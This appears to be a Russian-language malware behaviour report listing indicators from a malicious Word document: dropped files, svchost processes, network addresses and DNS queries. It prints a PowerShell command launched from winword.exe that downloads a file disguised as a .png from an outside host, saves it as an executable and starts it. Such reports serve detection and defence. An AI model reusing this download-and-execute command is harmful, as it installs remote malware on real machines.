Техническая информация
- '%TEMP%\config-lang.exe'
- '%ProgramFiles%\microsoft office\office14\winword.exe' (New-Object System.Net.WebClient).DownloadFile('https://ccmsaludtest.caser.es/html/css/portal_3.png','%TEMP%\config-lang.exe');start %TEMP%\config-lang.exe
- <SYSTEM32>\svchost.exe
- winword.exe
- %TEMP%\config-lang.exe
- %TEMP%\javadeployregback.log
- '<LOCALNET>.230.18':8080
- 'cc#####dtest.caser.es':443
- DNS ASK cc#####dtest.caser.es
- '<SYSTEM32>\svchost.exe' -k NetworkService' (со скрытым окном)
- '<SYSTEM32>\svchost.exe' -k NetworkService